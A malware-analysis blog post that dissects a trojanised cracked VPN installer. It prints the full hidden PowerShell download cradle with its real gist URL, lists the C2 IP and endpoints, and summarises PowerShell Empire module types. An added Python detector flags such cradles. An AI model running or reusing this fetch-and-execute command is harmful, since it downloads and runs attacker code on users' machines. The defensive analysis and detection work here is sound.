Friday, 1 December 2017

Malware research/reverse – Payload backdoor

Hello.
I have some free time and I am trying to help with internet safety. I'm just a small drop in the ocean, but I'm here!
Today I will show you something different.
As usual, I downloaded a few pieces of software and started the analysis.
I have a "great offer":
Hotspot Shield VPN 7.20.8.Elite Cracked

Woooow!!! (just kidding)
We have 3 important files.
Setup.exe and Update.exe appear to be archived files, and from previous posts we know what this means, but today our target is the HSS v.2.exe file.



Notice that it is the most recently created file.
The installation method also requires using this file.

OK. Let's scan this time!
VirusTotal report:

20/68 detections?!?
I mean, only 20 of the antivirus engines detect this file as a virus.


OK. It's normal for antivirus to flag it. It's just a crack, a patch, etc. You have to disable the antivirus to install it; it's just pirated software.
Let's get started.
It looks like this .exe is actually a .rar archive.

After opening it, it does a lot of work in the background.
We let it do its job to find out what it is doing!


When everything is quiet, we see that something is left running.

powershell.exe -nop -windowstyle Hidden -c “IEX (New-Object Net.WebClient).DownloadString(‘https://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1
The virus runs through the PowerShell.exe application, connecting to external sources:
h**ps://sgist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1raw9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1
It also connects to:
http://83.251.132.4
/admin/get.php
/login/process.php
/news.php
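As an added example (not code from the original post), here is a small Python detector for exactly this kind of PowerShell download cradle, run over process-creation command lines. The indicator patterns and the sample lines are my own construction; the gist URL from the post is replaced by a placeholder host.

```python
import re
from dataclasses import dataclass

# Indicators derived from the command line seen above, plus the long and
# short spellings of the same switches (assumption: operators vary them).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile":    re.compile(r"-nop(?:rofile)?\b", re.I),
    "iex":           re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web_download":  re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "encoded_cmd":   re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}
CORE = {"iex", "web_download", "encoded_cmd"}   # a cradle needs at least one of these
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
PS_RE = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)

@dataclass
class Finding:
    matched: list   # indicator names that fired
    urls: list      # remote sources the cradle would fetch from
    score: int      # higher = more cradle-like

def analyse_command_line(cmdline: str):
    """Return a Finding if cmdline looks like a PowerShell download cradle, else None."""
    if not PS_RE.search(cmdline):
        return None                                  # not a PowerShell launch at all
    matched = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    if not CORE & set(matched):
        return None                                  # switches alone are normal admin use
    # IEX combined with a download primitive is the cradle itself; weigh it extra.
    score = len(matched) + (2 if {"iex", "web_download"} <= set(matched) else 0)
    return Finding(matched, URL_RE.findall(cmdline), score)

def triage(lines):
    """Run the detector over many command lines; return findings, highest score first."""
    hits = [f for f in (analyse_command_line(line) for line in lines) if f]
    return sorted(hits, key=lambda f: f.score, reverse=True)

# Constructed samples: the first mirrors the line found in the post (placeholder URL),
# the second is benign admin usage of the same switches, the third is unrelated.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -windowstyle Hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('https://gist.example.invalid/raw/stage1.ps1')\"",
    "powershell.exe -NoProfile -Command Get-Service | Where-Object Status -eq Running",
    "C:\\Windows\\System32\\notepad.exe C:\\Users\\user\\notes.txt",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_CMDLINES):
        print(f.score, f.matched, f.urls)
```

Feeding this the CommandLine field of Sysmon Event ID 1 or Security 4688 records would surface the hidden-window cradle while leaving routine `-NoProfile` scripts alone.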

After investigating, I found out that it is a payload project.

Currently, PowerShell Empire has the following categories of modules:
  • Code Execution – Ways to run more code
  • Collection – Post exploitation data collection
  • Credentials – Collect and use creds
  • Exfiltration – Identify egress channels
  • Lateral Movement – Move around the network
  • Management – Host management and auxiliary
  • Persistence – Survive reboots
  • Privesc – Privilege escalation capabilities
  • Recon – Test further entry points (HTTP Basic Auth etc)
  • Situational Awareness – Network awareness
  • Trollsploit – For the lulz
Prodefence.org
What can I say... be careful!
Have fun & stay safe!!!
